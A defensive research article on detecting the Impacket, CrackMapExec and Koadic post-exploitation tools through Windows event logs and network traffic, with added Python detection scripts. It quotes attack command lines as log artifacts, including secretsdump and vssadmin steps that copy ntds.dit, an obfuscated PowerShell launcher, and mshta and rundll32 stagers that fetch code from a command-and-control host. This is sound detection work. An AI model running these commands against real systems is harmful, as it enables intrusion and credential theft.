How to detect attacks on Windows infrastructure: a study of hacker tools


The number of attacks on companies grows every year: in 2017, for instance, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. Among them are incidents where the main working tool is the Windows operating system. In 2017-2018, APT Dragonfly, APT28 and APT MuddyWater carried out attacks on government and military organizations in Europe, North America and Saudi Arabia. They used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It should be noted that these tools are not used for initial penetration but for developing an attack inside the infrastructure. Attackers use them at various stages of an attack after breaching the perimeter. This, by the way, is hard to detect, and often only possible with technology that finds traces of compromise in network traffic or with tools that detect an attacker's active actions once they are already inside the infrastructure. The tools provide a variety of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we needed to do:

  • Understand how the hacking tools work. Find out what attackers need in order to use them and which techniques they can apply.
  • Find out what information-security tools do not detect in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider or because the attacker is exploiting a hole in the infrastructure that was not previously known. It becomes possible to reconstruct the whole chain of his actions, hence the interest in detecting further movement.
  • Eliminate false positives from intrusion-detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent errors are possible. An infrastructure usually offers enough ways, indistinguishable from legitimate ones at first glance, to obtain any information.

What do these tools give attackers? In the case of Impacket, attackers get a large library of modules that can be used at various stages of an attack following a perimeter breach. Many tools use Impacket modules internally, Metasploit for example. It has dcomexec and wmiexec for remote command execution and secretsdump for obtaining accounts from memory, all of which were added from Impacket. As a result, correctly detecting the activity of such a library will also ensure detection of its derivatives.

It is no coincidence that the creators wrote "Powered by Impacket" about CrackMapExec (or simply CME). In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, running Meterpreter or an Empire agent for remote execution, and Bloodhound on board.

The third tool we chose is Koadic. It is quite recent: it was presented at the international hacker conference DEFCON 25 in 2017 and is distinguished by a non-standard approach: it works via HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, ranging from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials: an SMB relay attack, and obtaining the ntds.dit file containing password hashes from a domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Task Scheduler management service, DCOM and SMB, and it needs credentials to do so.

Secretsdump

Let's look at secretsdump. This is a module that can target both user machines and domain controllers. It can be used to obtain copies of the LSA, SAM, SECURITY and NTDS.dit memory areas, so it can be seen at different stages of an attack. The first step in the module's operation is authentication via SMB, which requires either the user's password or its hash to automatically carry out a Pass-the-Hash attack. Next comes a request to open access to the Service Control Manager (SCM) and to the registry via the winreg protocol, through which the attacker can read the data of the registry branches of interest and obtain the results via SMB.

In Fig. 1 we see exactly how, when the winreg protocol is used, access is obtained to the LSA registry key. For this, the DCERPC command with opcode 15 (OpenKey) is used.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key is obtained, its values are saved with the SaveKey command, opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. This file is then retrieved via SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for obtaining a registry key from a remote machine

It turns out that such activity on the network can be detected by the queries to certain registry branches via the winreg protocol, by the specific names, and by the commands and their order.

This module also leaves traces in the Windows event log, making it easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in the Windows Server 2016 log we will see the following sequence of key events:

1. 4624 - remote logon.
2. Check of access rights to the remote winreg service.
3. 5145 - check of access rights to a file in the System32 directory. The file has the random name mentioned above.
4. Creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. Creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. Creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. Creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

Smbexec

Like most post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication via SMB, either with a password or with a password hash. In Fig. 3 we see an example of how such a tool works, in this case a local administrator console.

Fig. 3. Interactive smbexec console

The first step of smbexec after authentication is opening the SCM with the OpenSCManagerW command (15). The request is notable: the MachineName field is DUMMY.

Fig. 4. Opening the Service Control Manager

After that, a service is created using the CreateServiceW command (12). In the case of smbexec, we see the same command construction logic every time. In Fig. 5, green shows the command parameters that do not change, yellow what the attacker can change. It is easy to see that the name of the executable, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service using the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log for an interactive command shell running the ipconfig command, we will see the following sequence of key events:

1. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from item 1.
3. 5145 - check of access rights to the __output file in the C$ share.
4. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from item 4.
6. 5145 - check of access rights to the __output file in the C$ share.

Impacket is the basis on which attack tools are built. It supports almost every protocol found in Windows infrastructure and at the same time has its own characteristic features: the specific winreg requests, the use of the SCM API with a fixed command format, the file-name format, and the SMB access to SYSTEM32.
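The host-side artifacts listed in the two event sequences above can be turned into a simple correlation rule. The following is an added example, not code from the article or from Impacket: it matches the execute.bat command template that appears in the 4688 (secretsdump with mmcexec) and 4697 (smbexec service) events, the 8-character random .tmp name from the 5145 events, and alerts per host only when those follow a 4624 logon. The event records and their field names (id, host, data) are constructed for the example and are not a Windows or SIEM schema.

```python
"""Added example: host-log detection of the Impacket secretsdump / smbexec
artifacts described in the article. Not the article's or Impacket's code."""
import re
from collections import defaultdict

# Command template from the article's 4688 (secretsdump -exec-method mmcexec)
# and 4697 (smbexec service binary path) events: the real command is echoed
# into %TEMP%\execute.bat with its output redirected to a file named __output,
# the batch file is executed, then deleted.
EXECUTE_BAT_RE = re.compile(
    r"echo\s+(?P<cmd>.+?)\s+\^>\s*(?P<out>\S*__output)\s+.*?"
    r">\s*%TEMP%\\execute\.bat\s*&.*?%TEMP%\\execute\.bat\s*&\s*del\s+%TEMP%\\execute\.bat",
    re.IGNORECASE,
)
# secretsdump saves registry hives as <8 random chars>.tmp under System32
# (rmumAfcn.tmp in the article). Weak on its own, hence the correlation below.
RANDOM_TMP_RE = re.compile(r"^[A-Za-z0-9]{8}\.tmp$")


def match_template(cmdline):
    """Return (inner_command, output_path) when cmdline follows the template."""
    m = EXECUTE_BAT_RE.search(cmdline)
    return (m.group("cmd"), m.group("out")) if m else None


def classify(cmdline):
    """Name the Impacket module a template command line most likely came from."""
    hit = match_template(cmdline)
    if hit is None:
        return None
    cmd, out = hit
    if "vssadmin" in cmd.lower() or "ntds.dit" in cmd.lower():
        return "secretsdump-mmcexec"   # shadow-copy handling of NTDS.dit
    if out.lower().startswith(r"\\127.0.0.1\c$"):
        return "smbexec"               # output collected through the C$ share
    return "impacket-template"


def is_random_tmp(target):
    """True for a 5145 relative target name such as system32\\rmumAfcn.tmp."""
    name = target.replace("/", "\\").rsplit("\\", 1)[-1]
    return RANDOM_TMP_RE.match(name) is not None


def correlate(events):
    """Per host: a 4624 logon followed by a template command (4688/4697) or a
    random .tmp access (5145). Returns {host: findings} for hosts that hit."""
    state = defaultdict(lambda: {"logon": False, "tools": set(), "tmp": []})
    for ev in events:
        st = state[ev["host"]]
        if ev["id"] == 4624:
            st["logon"] = True
        elif ev["id"] in (4688, 4697):
            tag = classify(ev["data"])
            if tag:
                st["tools"].add(tag)
        elif ev["id"] == 5145 and is_random_tmp(ev["data"]):
            st["tmp"].append(ev["data"])
    return {
        host: {"tools": sorted(st["tools"]), "tmp_files": st["tmp"]}
        for host, st in state.items()
        if st["logon"] and (st["tools"] or st["tmp"])
    }


# Constructed sample: DC01 carries the secretsdump and smbexec sequences from
# the article; FS01 carries ordinary administration that must not alert.
SAMPLE_EVENTS = [
    {"id": 4624, "host": "DC01", "data": "Administrator from 192.168.202.1"},
    {"id": 5145, "host": "DC01", "data": r"system32\rmumAfcn.tmp"},
    {"id": 4688, "host": "DC01", "data": r'"C:\windows\system32\cmd.exe" /Q /c echo '
     r"c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output "
     r"> %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"id": 4697, "host": "DC01", "data": r"%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 "
     r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"id": 4624, "host": "FS01", "data": "backup-svc from 192.168.202.50"},
    {"id": 4688, "host": "FS01", "data": r"C:\Windows\system32\cmd.exe /c ipconfig > C:\Temp\net.txt"},
    {"id": 5145, "host": "FS01", "data": r"system32\drivers\etc\hosts"},
]

if __name__ == "__main__":
    for host, findings in correlate(SAMPLE_EVENTS).items():
        print(host, findings)
```

The template match is the strong signal: an administrator may well run vssadmin or ipconfig, but not by echoing the command into %TEMP%\execute.bat, redirecting to a file named __output and deleting the batch file in the same line. The .tmp check only contributes when it co-occurs with a logon from the same session.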

CRACKMAPEXEC

The CME tool is designed primarily to automate the routine actions an attacker performs to advance inside the network. It can work in conjunction with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance inside the network. It collects data about users, machines, groups and sessions, and is supplied as a PowerShell script or a binary file. LDAP- and SMB-based protocols are used to collect the information. CME's integration module downloads Bloodhound to the victim machine, runs it and receives the collected data after execution, thereby automating the actions on the system and making them less noticeable. Bloodhound's graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to the domain administrator.

Fig. 6. Bloodhound interface

To work on the victim machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a call to cmd.exe with obfuscated code passed as arguments in XML format.

Fig. 7. Creating a task via CME

After the task is submitted for execution, the victim machine starts Bloodhound itself, and this can be seen in traffic. The module is characterized by LDAP queries for the standard groups and for the list of all machines and users in the domain, and by obtaining information about active user sessions via the SRVSVC NetSessEnum request.

Fig. 8. Obtaining a list of active sessions via SMB

In addition, launching Bloodhound on the victim machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name C:\Windows\System32\cmd.exe. What is notable about it is the command-line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

The enum_avproducts module is very interesting from the point of view of functionality and implementation. WMI allows the WQL query language to be used to retrieve data from various Windows objects, which is exactly what this CME module does. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim machine. To get the necessary data, the module connects to the root\SecurityCenter2 namespace, then generates a WQL query and receives the response. Fig. 9 shows the contents of such requests and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script runs, an event with ID 11 will be recorded. It will contain the name of the user who sent the request and the name in the root\SecurityCenter2 namespace.

Each CME module has its own artifacts, be it specific WQL queries, the creation of a particular kind of task in the Task Scheduler with obfuscation, or Bloodhound-specific activity in LDAP and SMB.
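The two host-side CME artifacts above (the obfuscated PowerShell launch in a 4688 event and the root\SecurityCenter2 WQL query in a WMI-Activity event 11) can both be checked from log data. The following is an added example, not code from the article, CME or Bloodhound. It resolves the $env:COMSPEC[4,26,25] index trick from the article's command line against an assumed default COMSPEC value, decodes [char[]](...)-join'' arrays back to text, counts the launch flags, and flags WMI-Activity events that query the AntiVirusProduct or AntiSpywareProduct classes. Because the article's char array is truncated, the sample command line is constructed around a benign stand-in payload; the WMI event dictionaries are constructed as well.

```python
"""Added example: checks for the CME artifacts discussed in the article.
Not the article's, CME's or Bloodhound's code."""
import re

DEFAULT_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}  # assumed default value

# $env:NAME[i,j,k]-join'' picks characters out of an environment variable to
# spell a cmdlet without writing it (the article's $eNV:cOmSPEc[4,26,25]).
ENV_INDEX_RE = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]\s*-join\s*''", re.IGNORECASE)
# [char[]](91, 78, ...)-join'' carries a string as a list of character codes.
CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]\(\s*([\d\s,]+?)\s*\)\s*-join\s*''", re.IGNORECASE)
# Launch flags from the article's command line, each with a short label.
FLAG_RES = [
    ("exec-bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.IGNORECASE)),
    ("noninteractive", re.compile(r"-noni\w*\b", re.IGNORECASE)),
    ("noprofile", re.compile(r"-nop\w*\b", re.IGNORECASE)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)),
]
AV_NAMESPACE = r"root\securitycenter2"
AV_CLASSES = {"antivirusproduct", "antispywareproduct"}


def resolve_env_index(cmdline, env=DEFAULT_ENV):
    """Resolve every $env:NAME[...]-join'' fragment to the string it spells."""
    upper_env = {k.upper(): v for k, v in env.items()}
    out = []
    for name, idx in ENV_INDEX_RE.findall(cmdline):
        value = upper_env.get(name.upper())
        if value is None:
            continue
        chars = [value[int(i)] for i in re.findall(r"\d+", idx) if int(i) < len(value)]
        out.append("".join(chars))
    return out


def decode_char_arrays(cmdline):
    """Turn each [char[]](...)-join'' fragment back into text."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", arr))
            for arr in CHAR_ARRAY_RE.findall(cmdline)]


def analyse_powershell_cmdline(cmdline, env=DEFAULT_ENV):
    """Collect launch flags, resolved env-index strings and decoded char arrays."""
    return {
        "flags": [label for label, rx in FLAG_RES if rx.search(cmdline)],
        "resolved": resolve_env_index(cmdline, env),
        "decoded": decode_char_arrays(cmdline),
    }


def is_cme_bloodhound_like(cmdline, env=DEFAULT_ENV):
    """Alert when at least two launch flags combine with either obfuscation trick."""
    r = analyse_powershell_cmdline(cmdline, env)
    obfuscated = "iex" in [s.lower() for s in r["resolved"]] or bool(r["decoded"])
    return obfuscated and len(r["flags"]) >= 2


def wmi_activity_hit(event):
    """WMI-Activity event 11 that queries the AV/AS product classes, as enum_avproducts does."""
    if event.get("id") != 11:
        return False
    ns = event.get("namespace", "").replace("/", "\\").lower()
    m = re.search(r"\bfrom\s+(\w+)", event.get("query", ""), re.IGNORECASE)
    return ns == AV_NAMESPACE and m is not None and m.group(1).lower() in AV_CLASSES


# Constructed sample: the article's launch line with a benign stand-in payload
# in place of its truncated character array.
PAYLOAD = "[Net.Dns]::GetHostName()"
SAMPLE_CMDLINE = (
    'cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & '
    "( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]]("
    + ", ".join(str(ord(c)) for c in PAYLOAD)
    + ")-jOIN'' ) \""
)
# Constructed WMI-Activity records: one enum_avproducts-like, one ordinary inventory query.
SAMPLE_WMI_EVENTS = [
    {"id": 11, "user": "CONTOSO\\Administrator", "namespace": r"root\SecurityCenter2",
     "query": "SELECT * FROM AntiVirusProduct"},
    {"id": 11, "user": "CONTOSO\\svc-monitor", "namespace": r"root\cimv2",
     "query": "SELECT * FROM Win32_OperatingSystem"},
]

if __name__ == "__main__":
    print(analyse_powershell_cmdline(SAMPLE_CMDLINE))
    print([wmi_activity_hit(e) for e in SAMPLE_WMI_EVENTS])
```

With the default COMSPEC, indices 4, 26 and 25 of C:\Windows\system32\cmd.exe are the letters i, e and x, so the first parenthesised expression in the article's command line evaluates to the iex alias without the word ever appearing in the log. Resolving it, rather than searching for the string "iex", is what keeps the check useful against case randomisation.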

KOADIC

The main feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this sense, it follows the living-off-the-land trend: it has no external dependencies and uses standard Windows tools. It is a full-fledged Command & Control (CnC) tool, since after infection an "implant" is installed on the machine, allowing it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If the privileges on the victim side are insufficient for full operation, Koadic can escalate them using User Account Control bypass techniques (UAC bypass).

Fig. 10. Koadic shell

The victim must initiate communication with the Command & Control server. To do this, it contacts a previously prepared URI and receives the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Starting a session with the CnC server

From the WS variable in the response it is clear that execution is done via WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE variables contain the key parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the called modules (implants). All Koadic modules work only within an active session with the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways to launch it. Below is a request-response pair for downloading the Mimikatz implant.

Fig. 12. Transferring Mimikatz to Koadic

You can see how the URI format in the request has changed. It now contains a value for the csrf variable, which identifies the selected module. Do not be misled by its name; we all know that CSRF is usually understood differently. The response is the same main Koadic body with Mimikatz-related code appended. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules that can execute commands remotely. Here we see the same URI generation method and the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Such code, as returned in the CnC server's HTTP response, is shown below.

Fig. 14. exec_cmd implant code

The GAWTUUGCFI variable with the familiar WS attribute is what executes the code. Through it the implant calls the shell, handling two code branches: shell.exec, which returns the output, and shell.run, which does not.

Koadic is not a typical tool, but it has artifacts of its own that can be picked out of legitimate-looking traffic:

  • the specific form of its HTTP requests,
  • use of the WinHttpRequest API,
  • creation of a WScript.Shell object via ActiveXObject,
  • a large executable body.

The initial connection is initiated by a stager, so its activity can be detected through Windows events. For mshta, this is event 4688, which records the creation of a process with the following command line:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see further 4688 events with attributes that characterize it very well:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
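The 4688 command lines above and the sid/csrf URI shape described in the Koadic sections are specific enough to match directly. The following is an added example, not code from the article or from Koadic: it classifies process command lines as the mshta stager, the rundll32 stager (URL with sid plus mshtml,RunHTMLApplication) or the exec_cmd implant (chcp 437 & command, output redirected to a GUID-named file under Temp), and separately checks a request URI for the sid;csrf pair. The first five sample lines reproduce the article's event data; the two benign lines and the URI samples are constructed.

```python
"""Added example: classify 4688 command lines and request URIs by the Koadic
artifacts described in the article. Not the article's or Koadic's code."""
import re

HEX32 = r"[0-9a-f]{32}"
GUID = r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}"

# mshta stager: mshta.exe started straight from an HTTP URL.
MSHTA_RE = re.compile(r"mshta\.exe\s+(?P<url>https?://\S+)", re.IGNORECASE)
# rundll32 stager: a URL carrying sid/csrf, executed via mshtml,RunHTMLApplication.
RUNDLL32_RE = re.compile(
    r"rundll32\.exe\s+https?://\S+?\?sid=(?P<sid>" + HEX32 + r").*mshtml,RunHTMLApplication",
    re.IGNORECASE,
)
# exec_cmd implant: chcp 437 & <command>, stdout and stderr sent to Temp\<GUID>.txt.
EXEC_CMD_RE = re.compile(
    r'cmd\.exe"?\s+/q\s+/c\s+chcp\s+437\s+&\s+(?P<cmd>.+?)\s+1>\s*'
    r"(?P<out>\S+\\Temp\\" + GUID + r"\.txt)\s+2>&1",
    re.IGNORECASE,
)
# URI shape of every module call after staging: ?sid=<32 hex>;csrf=<32 hex or empty>.
URI_RE = re.compile(r"\?sid=" + HEX32 + r"\s*;\s*csrf=(?:" + HEX32 + r")?(?:;|$)", re.IGNORECASE)


def classify_koadic_4688(cmdline):
    """Return (tag, detail) for a Koadic-looking 4688 command line, else None."""
    m = MSHTA_RE.search(cmdline)
    if m:
        return "koadic-stager-mshta", m.group("url")
    m = RUNDLL32_RE.search(cmdline)
    if m:
        return "koadic-stager-rundll32", m.group("sid")
    m = EXEC_CMD_RE.search(cmdline)
    if m:
        return "koadic-exec_cmd", m.group("cmd")
    return None


def koadic_uri_hit(uri):
    """True when a request URI carries the sid;csrf pair Koadic uses for module calls."""
    return URI_RE.search(uri) is not None


def scan(lines):
    """Classify each command line; keep only hits, in log order."""
    hits = []
    for line in lines:
        tag = classify_koadic_4688(line)
        if tag:
            hits.append(tag)
    return hits


# Lines 1-5 reproduce the article's 4688 data; the last two are constructed benign lines.
SAMPLE_4688_LINES = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1',
    r"rundll32.exe shell32.dll,Control_RunDLL",
    r"C:\Windows\system32\cmd.exe /q /c chcp 437 & dir",
]

if __name__ == "__main__":
    for tag, detail in scan(SAMPLE_4688_LINES):
        print(tag, detail)
```

The exec_cmd pattern deliberately requires the whole shape (code page switch, the command, the redirection to a GUID-named file in Temp, and 2>&1), because chcp 437 alone also appears in ordinary scripts; the last constructed line shows it being ignored for that reason.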

Conclusions

The living-off-the-land trend is gaining popularity among criminals. They use the tools and mechanisms built into Windows for their own purposes. We see the popular tools Koadic, CrackMapExec and Impacket, which follow this principle, appearing more and more often in APT reports. The number of forks of these tools on GitHub is also growing, and new ones keep appearing (there are about a thousand of them now). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools; the tools are already on the victims' machines and help them bypass security measures. We focus on the study of network communication: every tool described above leaves its own traces in network traffic, and a detailed study of them allowed us to teach our product PT Network Attack Discovery to detect them, which in turn helps investigate the whole chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

source: www.habr.com
